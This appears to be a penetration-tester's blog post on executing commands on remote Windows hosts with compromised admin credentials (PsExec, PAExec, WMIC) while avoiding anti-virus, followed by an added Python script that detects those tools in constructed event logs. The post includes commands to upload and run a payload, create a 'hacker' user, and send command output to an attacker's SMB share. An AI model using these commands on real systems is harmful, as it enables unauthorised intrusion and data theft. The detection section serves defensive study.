Most penetration testers will know and love Metasploit's PsExec module for running commands on remote Windows machines. If you're not familiar with it, it allows you to take a compromised Local Administrator account and use it to execute commands on the remote machine (or to upload Meterpreter, of course!). These methods all require the ability to write to Admin$ on the remote machine, which basically means a Local Administrator account.
Sometimes, however, the psexec module from Metasploit gets eaten by anti-virus engines, which is frustrating and delays a tester going about their work. So here are a couple of tricks for getting around AV quickly, for when you just want to run your commands and get back to Starbucks.
Metasploit's PsExec
It's available in Metasploit under exploit/windows/smb/psexec and all it requires is an RHOST, SMBUser and SMBPass.
PsTools and PsExec
Although Meterpreter's PsExec is often picked up by anti-virus, I personally find that the original PsTools PsExec isn't! Which is most convenient; download it here and give it a try: https://technet.microsoft.com/en-gb/sysinternals/bb896649.aspx It works something like this:
psexec \\TargetIP -u Admin -p Password1 cmd
(Where "cmd" requests that it spawns an interactive command shell.)
PowerAdmin with PaExec
A nice alternative to PsExec is PaExec, available here: http://www.poweradmin.com/paexec/. Its usage is basically the same; try this:
PAExec \\TargetIP -u Admin -p Password1 -s cmd.exe
Don't feel like a command shell but instead want to upload your own tools (or a Veil-Evasion payload perhaps...)? Then give this one a shot:
PAExec \\TargetIP -u Admin -p Password1 -i -c Payload.exe
This will upload Payload.exe to the remote machine and execute it!
WMIC
Finally, when all else fails I pull out WMIC, which, although it's an older method, seems to have fallen out of use; many testers I've worked with are either unaware of it or have forgotten its existence. Easy to use though, something like this:
wmic /node:TargetIP /username:Admin /password:Password1 process call create "add user hacker Hacker1 /add"
The commands here execute blindly, which any tester worth her salt can deal with, but a quick hack will get you the command output. Spin up a network share that can be written to by the compromised user (or "Everybody") and you can redirect the output to an SMB share!
wmic /node:TargetIP /username:Admin /password:Password1 process call create "ipconfig >> \\AttackerIP\results.txt"
So that's a few different ways of achieving the same thing, but more often than not it's always good to have a Plan B and C, particularly when anti-virus is getting a bit big for its boots!
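Each of the three approaches above (PsExec, PaExec and WMIC) leaves a distinct trace in the target's Windows event logs, and a blue team that only watches for Metasploit's psexec module will miss the other two. The script below is an added example, not code from the original post or from any of the tools it names: it classifies a handful of constructed event records using publicly documented tool behaviour (PsExec registers a service called PSEXESVC, PAExec registers PAExec-<pid>-<source host>, remote `wmic process call create` runs the new process under WmiPrvSE.exe, and all of them touch ADMIN$ over SMB first). The event field names, host names and IP addresses in the sample data are assumptions made up for the example.

```python
"""Host-log detection for the lateral-movement tools discussed above.

Added example, not code from the original post. The events below are
constructed records that mimic a few Windows log fields; the indicators
are documented tool behaviours rather than anything taken from the page:
  * Sysinternals PsExec installs a service called PSEXESVC on the target
    (System log, Event ID 7045, "A service was installed in the system").
  * PAExec installs a service called PAExec-<pid>-<source host> (same event).
  * A remote `wmic ... process call create` starts the new process as a
    child of WmiPrvSE.exe (Security log, Event ID 4688 with parent logged).
  * All three first write to ADMIN$ over SMB (Security log, Event ID 5145).
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int   # Windows Event ID
    host: str       # machine that logged the event (the target)
    fields: dict    # subset of the event's data fields (assumed names)


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str
    evidence: str


# Service names the two PsExec-style tools register on the target.
SERVICE_PATTERNS = {
    "PsExec": re.compile(r"^PSEXESVC$", re.IGNORECASE),
    "PaExec": re.compile(r"^PAExec-\d+-[^\s\\]+$", re.IGNORECASE),
}
# Output redirected into a UNC path, e.g. `ipconfig >> \\10.0.0.99\results.txt`
UNC_REDIRECT = re.compile(r">{1,2}\s*\\\\[^\s\\]+\\")


def classify(ev: Event):
    """Return a Finding for a single suspicious event, else None."""
    if ev.event_id == 7045:
        name = ev.fields.get("ServiceName", "")
        for tool, pattern in SERVICE_PATTERNS.items():
            if pattern.match(name):
                return Finding(ev.host, f"{tool} service install",
                               f"7045 ServiceName={name}")
    elif ev.event_id == 4688:
        parent = ev.fields.get("ParentProcessName", "")
        cmdline = ev.fields.get("CommandLine", "")
        if parent.lower().endswith("\\wmiprvse.exe"):
            technique = "WMI remote process creation"
            if UNC_REDIRECT.search(cmdline):
                technique += " with output redirected to a network share"
            return Finding(ev.host, technique, f"4688 {parent} -> {cmdline}")
    return None


def admin_share_sources(events):
    """Map target host -> set of client addresses that opened ADMIN$ (5145)."""
    sources = {}
    for ev in events:
        share = ev.fields.get("ShareName", "").upper()
        if ev.event_id == 5145 and share.endswith("\\ADMIN$"):
            sources.setdefault(ev.host, set()).add(ev.fields.get("IpAddress", "?"))
    return sources


def detect(events):
    """All findings, each annotated with the ADMIN$ clients seen on that host."""
    sources = admin_share_sources(events)
    findings = []
    for ev in events:
        found = classify(ev)
        if found:
            clients = ", ".join(sorted(sources.get(ev.host, []))) or "none logged"
            findings.append(Finding(found.host, found.technique,
                                    f"{found.evidence}; ADMIN$ clients: {clients}"))
    return findings


# Constructed sample events (not real logs): one hit per tool plus two benign records.
SAMPLE_EVENTS = [
    Event(5145, "SRV01", {"ShareName": "\\\\*\\ADMIN$", "IpAddress": "10.0.0.99"}),
    Event(7045, "SRV01", {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}),
    Event(7045, "SRV02", {"ServiceName": "PAExec-4120-TESTER",
                          "ImagePath": "C:\\Windows\\PAExec-4120-TESTER.exe"}),
    Event(4688, "SRV03", {"ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
                          "NewProcessName": "C:\\Windows\\System32\\ipconfig.exe",
                          "CommandLine": "ipconfig >> \\\\10.0.0.99\\results.txt"}),
    Event(7045, "SRV04", {"ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"}),
    Event(4688, "SRV04", {"ParentProcessName": "C:\\Windows\\explorer.exe",
                          "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
                          "CommandLine": "notepad.exe"}),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"[{finding.host}] {finding.technique}: {finding.evidence}")
```

Two caveats when running this logic against real logs: Event ID 5145 only appears if "Audit Detailed File Share" is enabled, and Event ID 4688 only carries the parent process name and command line on recent Windows versions with "Include command line in process creation events" switched on. Without those settings the service-install check (7045) is the one signal that survives, so it is the one to alert on first.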